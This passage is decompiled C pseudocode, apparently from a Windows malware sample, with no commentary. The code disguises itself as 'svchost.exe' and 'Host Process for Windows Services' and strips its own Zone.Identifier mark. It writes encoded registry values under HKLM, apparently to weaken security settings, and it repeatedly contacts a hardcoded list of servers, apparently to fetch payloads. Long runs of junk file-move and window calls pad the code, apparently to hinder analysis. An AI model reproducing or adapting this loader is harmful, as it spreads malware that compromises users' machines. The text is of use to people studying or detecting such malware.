							MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
							ShowWindow(_v4172, 1);
							Sleep(0x1f4);
							ShowWindow(_v4172, 1);
							Sleep(0x3a98);
							MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "2uu5uii55i5i25i52i5ii2525i5i25i");
							DeleteFileA("3r38r38r838r838r388r838r83");
							ShowWindow(_v4172, 0);
							Sleep(0x1f4);
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						}
						_v4224 = 0;
						while(_v4224 < 0x320) {
							Sleep(0x1388);
							MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
							_v4224 = _v4224 + 1;
						}
						goto L38;
					}
					DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
					MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
					MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
					Sleep(0x1388);
					DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
					Sleep(0xbb8);
					DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
					_v4184 = InternetOpenUrlA(_v4196, "http://www.yandex.ru/", 0, 0, 0, 0);
					Sleep(0x7d0);
					if(_v4184 == 0) {
						L13:
						InternetCloseHandle(_v4184);
						DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
						goto L14;
					}
					_v4212 = 0;
					while(_v4212 < 0x320) {
						DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						Sleep(0x7d0);
						MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
						Sleep(0xfa0);
						DeleteFileA("3r38r38r838r838r388r838r83");
						_v4212 = _v4212 + 1;
					}
					goto L13;
				}
				Sleep(0x1f4); // executed
				_t574 = E008B2930(); // executed
				if((_t574 & 0x000000ff) == 1 || (E008B28E0() & 0x000000ff) == 1) {
					ExitProcess(0);
				} else {
					_t1231 = "tyu6uyur"; // 0x36757974
					_v1296 = _t1231;
					_t576 =  *0x8b6fec; // 0x72757975
					_v1292 = _t576;
					_t1094 =  *0x8b6ff0; // 0x0
					_v1288 = _t1094;
					_t1232 = L"svchost.exe"; // 0x760073
					_v2608 = _t1232;
					_t577 = M008B6FF8; // 0x680063
					_v2604 = _t577;
					_t1095 = M008B6FFC; // 0x73006f
					_v2600 = _t1095;
					_t1233 = M008B7000; // 0x2e0074
					_v2596 = _t1233;
					_t578 =  *0x8b7004; // 0x780065
					_v2592 = _t578;
					_t1096 =  *0x8b7008; // 0x65
					_v2588 = _t1096;
					memcpy( &_v1284, L"Host Process for Windows Services", 0x11 << 2);
					_v1988 = "http://185.215.113.10/";
					_v1984 = "http://tsrv3.ru/";
					_v1980 = "http://tsrv4.ws/";
					_v1976 = "http://tsrv5.top/";
					_v1972 = "http://thaus.ws/";
					_v1968 = "http://zzruuoooshfrohu.su/";
					_v1964 = "http://tldrbox.top/";
					_v1960 = "http://thaus.ws/";
					_v2560 = "1";
					_v2556 = "2";
					_v2552 = "3";
					_v2548 = "4";
					_v2544 = "5";
					_v2540 = "6";
					_v4168 = L"%systemdrive%";
					_v4164 = L"%userprofile%";
					_v4160 = L"%temp%";
					_t1234 =  *0x8b715c; // 0xb0a2b895
					_v1360 = _t1234;
					_t580 =  *0x8b7160; // 0x90b4bdb3
					_v1356 = _t580;
					_t1099 =  *0x8b7164; // 0x82b8a5bf
					_v1352 = _t1099;
					_t1235 =  *0x8b7168; // 0xb0a6a8a1
					_v1348 = _t1235;
					_t581 =  *0x8b716c; // 0xb4a3
					_v1344 = _t581;
					_t1100 =  *0x8b716e; // 0x0
					_v1342 = _t1100;
					memcpy( &_v2536, 0x8b7170, 7 << 2);
					memcpy( &_v1212, 0x8b718c, 6 << 2);
					asm("movsw");
					memcpy( &_v3424, 0x8b71a8, 6 << 2);
					asm("movsw");
					memcpy( &_v1956, 0x8b71c4, 0xb << 2);
					asm("movsb");
					memcpy( &_v4068, 0x8b71f8, 0x10 << 2);
					asm("movsw");
					_t1236 =  *0x8b723c; // 0xb8a5bf90
					_v4156 = _t1236;
					_t587 =  *0x8b7240; // 0xa6a8a182
					_v4152 = _t587;
					_t1111 =  *0x8b7244; // 0x9eb4a3b0
					_v4148 = _t1111;
					_t1237 =  *0x8b7248; // 0xa3a3b4a7
					_v4144 = _t1237;
					_t588 =  *0x8b724c; // 0xb4b5b8
					_v4140 = _t588;
					_t1112 =  *0x8b7250; // 0xb8a5bf90
					_v1908 = _t1112;
					_t1238 =  *0x8b7254; // 0xa4a3b887
					_v1904 = _t1238;
					_t589 =  *0x8b7258; // 0xb4a79ea2
					_v1900 = _t589;
					_t1113 =  *0x8b725c; // 0xb5b8a3a3
					_v1896 = _t1113;
					_t1239 =  *0x8b7260; // 0xb4
					_v1892 = _t1239;
					memcpy( &_v4132, 0x8b7264, 5 << 2);
					asm("movsw");
					asm("movsb");
					_t591 =  *0x8b727c; // 0xb4a3b897
					_v1184 = _t591;
					_t1116 =  *0x8b7280; // 0xbdbdb0a6
					_v1180 = _t1116;
					_t1240 =  *0x8b7284; // 0xa3b4a79e
					_v1176 = _t1240;
					_t592 =  *0x8b7288; // 0xb4b5b8a3
					_v1172 = _t592;
					_t1117 =  *0x8b728c; // 0x0
					_v1168 = _t1117;
					_t1241 =  *0x8b7290; // 0xb4a3b897
					_v3972 = _t1241;
					_t593 =  *0x8b7294; // 0xbdbdb0a6
					_v3968 = _t593;
					_t1118 =  *0x8b7298; // 0xb0a2b895
					_v3964 = _t1118;
					_t1242 =  *0x8b729c; // 0x9fb4bdb3
					_v3960 = _t1242;
					_t594 =  *0x8b72a0; // 0xb7b8a5be
					_v3956 = _t594;
					_t1119 =  *0x8b72a4; // 0xa8
					_v3952 = _t1119;
					_t1243 =  *0x8b72a8; // 0xb0b5a184
					_v3992 = _t1243;
					_t595 =  *0x8b72ac; // 0x9ea2b4a5
					_v3988 = _t595;
					_t1120 =  *0x8b72b0; // 0xa3a3b4a7
					_v3984 = _t1120;
					_t1244 =  *0x8b72b4; // 0xf1b4b5b8
					_v3980 = _t1244;
					_t596 =  *0x8b72b8; // 0x0
					_v3976 = _t596;
					_t1121 =  *0x8b72bc; // 0xb0b5a184
					_v2584 = _t1121;
					_t1245 =  *0x8b72c0; // 0x95a2b4a5
					_v2580 = _t1245;
					_t597 =  *0x8b72c4; // 0xb3b0a2b8
					_v2576 = _t597;
					_t1122 =  *0x8b72c8; // 0xbe9fb4bd
					_v2572 = _t1122;
					_t1246 =  *0x8b72cc; // 0xa8b7b8a5
					_v2568 = _t1246;
					_t598 =  *0x8b72d0; // 0x0
					_v2564 = _t598;
					memcpy( &_v1164, 0x8b72d4, 9 << 2);
					memcpy( &_v4108, 0x8b72f8, 0xa << 2);
					_t1127 =  *0x8b7320; // 0xb0a2b895
					_v1128 = _t1127;
					_t1247 =  *0x8b7324; // 0x82b4bdb3
					_v1124 = _t1247;
					_t601 =  *0x8b7328; // 0x83
					_v1120 = _t601;
					_t1128 =  *0x8b732a; // 0x0
					_v1118 = _t1128;
					memcpy( &_v1116, 0x8b7330, 0x10 << 2);
					_t1405 = _t1395 + 0x78;
					_t603 = CreateMutexA(0, 0,  &_v1296); // executed
					_v4136 = _t603;
					if(GetLastError() != 0xb7) {
						_v1888 = 0;
						_v528 = 1;
						_v1340 = 0;
						_v1336 = 0;
						_v1332 = 0;
						_v1328 = 0;
						_v1324 = 0;
						_v1320 = 0;
						_v1316 = 0;
						_v1312 = 0;
						_v1308 = 0;
						_v1304 = 0;
						_v1300 = 0;
						_v2612 = 0x1f7c;
						while(_v1300 < _v2612) {
							_t912 = PathFileExistsW(L"3r37grg73g7e37geg73g7eg73g7e"); // executed
							if(_t912 == 0) {
								L68:
								_t913 = FindWindowA("3r38r38r838r838r388r838r83", 0); // executed
								_v4240 = _t913;
								if(_v4240 == 0) {
									L97:
									_v1300 = _v1300 + 1;
									continue;
								}
								MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
								Sleep(0x1f40);
								DeleteFileW(L"nw55n5nww5n5nww5nw5n5n5n5n");
								MoveFileA("4tt4t4wwt44t4tw4tw4wt4tw4t", "2uu5uii55i5i25i52i5ii2525i5i25i");
								Sleep(0x7d0);
								_v4276 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
								DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
								if(_v4276 != 0) {
									DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
									_v4264 = InternetOpenUrlA(_v4276, "http://www.yandex.ru/", 0, 0, 0, 0);
									if(_v4264 != 0) {
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										Sleep(0x1388);
									}
									InternetCloseHandle(_v4264);
									Sleep(0x1388);
								}
								InternetCloseHandle(_v4276);
								if(PathFileExistsA("2uu5uii55i5i25i52i5ii2525i5i25i") != 0) {
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									MoveFileA("4tt4t4wwt44t4tw4tw4wt4tw4t", "2uu5uii55i5i25i52i5ii2525i5i25i");
								}
								_v4260 = FindWindowA("3r37g37e7g3ge3ge7g37ge737eg", 0);
								if(_v4260 != 0) {
									CopyFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									CloseWindow(_v4240);
								}
								Sleep(0xbb8);
								MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
								ShowWindow(_v4240, 1);
								MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
								SetForegroundWindow(_v4240);
								Sleep(0x7d0);
								SetFocus(_v4240);
								_v4284 = 0x5a;
								_v4268 = 0x32;
								_v4280 = _v4284 + _v4268;
								if(_v4280 < 0x2710) {
									MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
									_v4288 = FindWindowA("2uu5uii55i5i25i52i5ii2525i5i25i", 0);
									_v4276 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
									if(_v4276 != 0) {
										Sleep(0x3e8);
										_v4264 = InternetOpenUrlA(_v4276, "http://www.yandex.ru/", 0, 0, 0, 0);
										if(_v4264 != 0) {
											Sleep(0x2710);
											MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
											DeleteFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h");
											MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"nw55n5nww5n5nww5nw5n5n5n5n");
										}
										InternetCloseHandle(_v4264);
										Sleep(0x64);
									}
									InternetCloseHandle(_v4276);
									Sleep(0x3e8);
									if(_v4288 != 0) {
										SetForegroundWindow(_v4288);
										DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
										MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
										ShowWindow(_v4288, 0);
										DeleteFileW(L"nw55n5nww5n5nww5nw5n5n5n5n");
										Sleep(0xdac);
										_v4276 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
										if(_v4276 != 0) {
											_v4264 = InternetOpenUrlA(_v4276, "http://www.yandex.ru/", 0, 0, 0, 0);
											if(_v4264 != 0) {
												MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
											}
											InternetCloseHandle(_v4264);
											Sleep(0x64);
											MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
											DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
											Sleep(0x2710);
										}
										InternetCloseHandle(_v4276);
									}
								}
								_v4272 = 0x15f90;
								_v4256 = 0x190;
								while(_v4272 > _v4256) {
									_v4292 = FindWindowA("3r38r38r838r838r388r838r83", 0);
									if(_v4292 != 0) {
										MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
										DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
										_v4256 = _v4256 + 1;
									}
								}
								_v4296 = 0;
								while(_v4296 < 0x2328) {
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									Sleep(0x1388);
									MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
									_v4296 = _v4296 + 1;
								}
								goto L97;
							}
							MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
							_v4248 = 0;
							while(_v4248 < 0xbb8) {
								MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
								DeleteFileA("3r38r38r838r838r388r838r83");
								_v4248 = _v4248 + 1;
							}
							Sleep(0x7d0);
							_v4244 = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
							if(_v4244 != 0) {
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								CopyFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								DeleteFileA("3r38r38r838r838r388r838r83");
								Sleep(0x2710);
							}
							_v4252 = 0;
							while(_v4252 < 0x9c4) {
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								_v4252 = _v4252 + 1;
							}
							goto L68;
						}
						Sleep(0x1f4); // executed
						_t607 = GetModuleFileNameW(0,  &_v1884, 0x208);
						Sleep(0x1f4); // executed
						E008B16D0(_t607); // executed
						__imp__CoInitializeEx(0, 0); // executed
						_v3428 = PathFindFileNameW( &_v1884);
						wsprintfW( &_v524, L"%ls:Zone.Identifier",  &_v1884);
						DeleteFileW( &_v524); // executed
						srand(GetTickCount());
						Sleep(0x64); // executed
						_t614 = E008B5560( &_v1884, L"svchost.");
						_t1408 = _t1405 + 0x18;
						if(_t614 != 0) {
							L195:
							Sleep(0x1f4);
							_t616 = E008B27E0( &_v1956);
							_t1409 = _t1408 + 4;
							if(RegOpenKeyExA(0x80000002, _t616, 0, 0xf003f,  &_v1888) != 0) {
								L201:
								Sleep(0x1f4);
								_t619 = E008B27E0( &_v1164);
								_t1410 = _t1409 + 4;
								if(RegOpenKeyExA(0x80000002, _t619, 0, 0xf003f,  &_v1888) == 0) {
									E008B27E0( &_v4156);
									E008B27E0( &_v1908);
									E008B27E0( &_v4132);
									E008B27E0( &_v1184);
									E008B27E0( &_v3972);
									E008B27E0( &_v3992);
									E008B27E0( &_v2584);
									_t1410 = _t1410 + 0x1c;
									RegSetValueExA(_v1888,  &_v4156, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v1908, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v4132, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v1184, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v3972, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v3992, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v2584, 0, 4,  &_v528, 4);
									RegCloseKey(_v1888);
								}
								Sleep(0x1f4);
								_t621 = E008B27E0( &_v4108);
								_t1411 = _t1410 + 4;
								if(RegOpenKeyExA(0x80000002, _t621, 0, 0xf003f,  &_v1888) == 0) {
									E008B27E0( &_v4156);
									E008B27E0( &_v1908);
									E008B27E0( &_v4132);
									E008B27E0( &_v1184);
									E008B27E0( &_v3972);
									E008B27E0( &_v3992);
									E008B27E0( &_v2584);
									_t1411 = _t1411 + 0x1c;
									RegSetValueExA(_v1888,  &_v4156, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v1908, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v4132, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v1184, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v3972, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v3992, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v2584, 0, 4,  &_v528, 4);
									RegCloseKey(_v1888);
								}
								Sleep(0x1f4);
								CreateThread(0, 0, E008B1660, 0, 0, 0);
								Sleep(0x1f4);
								CreateThread(0, 0, E008B2600, 0, 0, 0);
								Sleep(0x1f4);
								while(1) {
									Sleep(0x64);
									_v4420 = 0;
									while(_v4420 < 8) {
										Sleep(0x64);
										_v4424 = 0;
										while(_v4424 < 6) {
											Sleep(0x64);
											wsprintfA( &_v3396, "%s%s",  *((intOrPtr*)(_t1394 + _v4420 * 4 - 0x7c0)),  *((intOrPtr*)(_t1394 + _v4424 * 4 - 0x9fc)));
											_t630 = E008B2A10( &_v3396, _t1394 + _v4424 * 4 - 0x538);
											_t1411 = _t1411 + 0x18;
											if((_t630 & 0x000000ff) == 1) {
												E008B19F0( &_v3396);
												_t1411 = _t1411 + 4;
											}
											_v4424 = _v4424 + 1;
										}
										_v4420 = _v4420 + 1;
									}
									_t625 = rand();
									asm("cdq");
									Sleep(0x2710 + _t625 % 0xea60 * 0x14);
								}
							}
							RegSetValueExA(_v1888, E008B27E0( &_v1360), 0, 4,  &_v528, 4);
							_t688 = E008B27E0( &_v4068);
							_t1426 = _t1409 + 8;
							if(RegOpenKeyExA(0x80000002, _t688, 0, 0xf003f,  &_v1888) != 0) {
								_t706 = E008B27E0( &_v4068);
								_t1426 = _t1426 + 4;
								RegCreateKeyExA(0x80000002, _t706, 0, 0, 0, 0x20006, 0,  &_v1888, 0);
							}
							_t691 = E008B27E0( &_v4068);
							_t1409 = _t1426 + 4;
							if(RegOpenKeyExA(0x80000002, _t691, 0, 0xf003f,  &_v1888) == 0) {
								E008B27E0( &_v2536);
								E008B27E0( &_v1212);
								E008B27E0( &_v3424);
								_t1409 = _t1409 + 0xc;
								RegSetValueExA(_v1888,  &_v2536, 0, 4,  &_v528, 4);
								RegSetValueExA(_v1888,  &_v1212, 0, 4,  &_v528, 4);
								RegSetValueExA(_v1888,  &_v3424, 0, 4,  &_v528, 4);
								RegCloseKey(_v1888);
							}
							RegCloseKey(_v1888);
							goto L201;
						}
						Sleep(0x1f4); // executed
						_v1300 = 0;
						_v2612 = 0x2346;
						while(_v1300 < _v2612) {
							_t850 = FindWindowA("3r38r38r838r838r388r838r83", 0); // executed
							_v4300 = _t850;
							if(_v4300 == 0) {
								L130:
								_v1300 = _v1300 + 1;
								continue;
							}
							DeleteFileA("3r38r38r838r838r388r838r83");
							Sleep(0x1770);
							DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
							if(PathFileExistsA("2uu5uii55i5i25i52i5ii2525i5i25i") != 0) {
								DeleteFileA("3r38r38r838r838r388r838r83");
								MoveFileA("4tt4t4wwt44t4tw4tw4wt4tw4t", "2uu5uii55i5i25i52i5ii2525i5i25i");
								DeleteFileA("3r38r38r838r838r388r838r83");
							}
							_v4308 = FindWindowA("3r37g37e7g3ge3ge7g37ge737eg", 0);
							if(_v4308 != 0) {
								MoveFileA("4tt4t4wwt44t4tw4tw4wt4tw4t", "2uu5uii55i5i25i52i5ii2525i5i25i");
								ShowWindow(_v4300, 1);
								ShowWindow(_v4300, 1);
								Sleep(0xbb8);
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								ShowWindow(_v4300, 0);
								CopyFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
								CloseWindow(_v4300);
							}
							_v4324 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
							if(_v4324 != 0) {
								_v4312 = InternetOpenUrlA(_v4324, "http://www.yandex.ru/", 0, 0, 0, 0);
								if(_v4312 != 0) {
									DeleteFileA("3r38r38r838r838r388r838r83");
									Sleep(0x9c40);
									DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
								}
								InternetCloseHandle(_v4312);
								Sleep(0x1388);
							}
							InternetCloseHandle(_v4324);
							Sleep(0xbb8);
							ShowWindow(_v4300, 1);
							MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
							ShowWindow(_v4300, 0);
							Sleep(0x7d0);
							SetForegroundWindow(_v4300);
							DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
							SetFocus(_v4300);
							CloseWindow(_v4300);
							_v4332 = 0x22;
							_v4316 = 0x3c;
							_v4328 = _v4332 + _v4316;
							if(_v4328 < 0x1f4) {
								DeleteFileA("3r38r38r838r838r388r838r83");
								_v4336 = FindWindowA("2uu5uii55i5i25i52i5ii2525i5i25i", 0);
								MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
								_v4324 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
								if(_v4324 != 0) {
									_v4312 = InternetOpenUrlA(_v4324, "http://www.yandex.ru/", 0, 0, 0, 0);
									if(_v4312 != 0) {
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										Sleep(0x2710);
										DeleteFileA("3r37g37e7g3ge3ge7g37ge737eg");
									}
									InternetCloseHandle(_v4312);
									Sleep(0x64);
								}
								InternetCloseHandle(_v4324);
								Sleep(0x3e8);
								if(_v4336 != 0) {
									Sleep(0x7d0);
									SetForegroundWindow(_v4336);
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									ShowWindow(_v4336, 0);
									DeleteFileA("3r37g37e7g3ge3ge7g37ge737eg");
									Sleep(0x1194);
									_v4324 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
									if(_v4324 != 0) {
										_v4312 = InternetOpenUrlA(_v4324, "http://www.yandex.ru/", 0, 0, 0, 0);
										if(_v4312 != 0) {
											Sleep(0x1388);
											DeleteFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h");
											MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
											DeleteFileA("3r38r38r838r838r388r838r83");
										}
										InternetCloseHandle(_v4312);
										Sleep(0x1388);
									}
									InternetCloseHandle(_v4324);
									DeleteFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h");
								}
							}
							_v4320 = 0x1770;
							_v4304 = 0x8fc;
							while(_v4320 > _v4304) {
								_v4340 = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
								if(_v4340 != 0) {
									DeleteFileA("2uu5uii55i5i25i52i5ii2525i5i25i");
									_v4304 = _v4304 + 1;
								}
							}
							_v4344 = 0;
							while(_v4344 < 0x1388) {
								DeleteFileA("3r38r38r838r838r388r838r83");
								MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
								_v4344 = _v4344 + 1;
							}
							goto L130;
						}
						Sleep(0x3e8); // executed
						_v4348 = 0;
						while(_v4348 < 3) {
							Sleep(0x1f4); // executed
							_v1300 = 0;
							_v2612 = 0x236e;
							while(_v1300 < _v2612) {
								_t752 = FindWindowA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", 0); // executed
								_v4352 = _t752;
								if(_v4352 == 0) {
									L172:
									_t753 = PathFileExistsW(L"3r37grg73g7e37geg73g7eg73g7e"); // executed
									if(_t753 == 0) {
										L183:
										_v1300 = _v1300 + 1;
										continue;
									}
									DeleteFileA("3r38r38r838r838r388r838r83");
									_v4412 = 0;
									while(_v4412 < 0x1770) {
										MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
										DeleteFileA("3r38r38r838r838r388r838r83");
										_v4412 = _v4412 + 1;
									}
									Sleep(0x1388);
									_v4408 = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
									if(_v4408 != 0) {
										DeleteFileA("3r38r38r838r838r388r838r83");
										SetForegroundWindow(_v4352);
										SetFocus(_v4352);
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
										Sleep(0xc8);
										CloseWindow(_v4352);
										Sleep(0xfa0);
									}
									_v4416 = 0;
									while(_v4416 < 0x9c4) {
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
										_v4416 = _v4416 + 1;
									}
									goto L183;
								}
								Sleep(0x7d0);
								DeleteFileA("3r38r38r838r838r388r838r83");
								DeleteFileA("3r38r38r838r838r388r838r83");
								Sleep(0x7d0);
								DeleteFileA("3r38r38r838r838r388r838r83");
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"w4rr4w4rw4rwr44rr4w4rr44r");
								_v4388 = 0;
								while(_v4388 < 0x190) {
									Sleep(0xfa0);
									MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
									MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
									Sleep(0xfa0);
									DeleteFileA("3r38r38r838r838r388r838r83");
									_v4388 = _v4388 + 1;
								}
								Sleep(0x3e8);
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								Sleep(0x1770);
								MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
								Sleep(0x1388);
								DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
								_v4376 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
								DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								if(_v4376 == 0) {
									L148:
									Sleep(0x7d0);
									DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
									InternetCloseHandle(_v4376);
									DeleteFileA("3r38r38r838r838r388r838r83");
									SetForegroundWindow(_v4352);
									SetFocus(_v4352);
									MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
									CloseWindow(_v4352);
									MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
									_v4384 = 0x58;
									_v4368 = 0x42;
									_v4380 = _v4384 + _v4368;
									if(_v4380 < 0x1f4) {
										MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
										Sleep(0x1388);
										MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
										_v4396 = FindWindowA("2uu5uii55i5i25i52i5ii2525i5i25i", 0);
										_v4376 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
										if(_v4376 != 0) {
											Sleep(0x1388);
											MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
											_v4364 = InternetOpenUrlA(_v4376, "http://www.yandex.ru/", 0, 0, 0, 0);
											if(_v4364 != 0) {
												Sleep(0x1388);
												DeleteFileA("3r38r38r838r838r388r838r83");
												MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"nw55n5nww5n5nww5nw5n5n5n5n");
												Sleep(0xfa0);
												DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
											}
											InternetCloseHandle(_v4364);
											Sleep(0xdac);
										}
										InternetCloseHandle(_v4376);
										Sleep(0x1388);
										if(_v4396 != 0) {
											MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
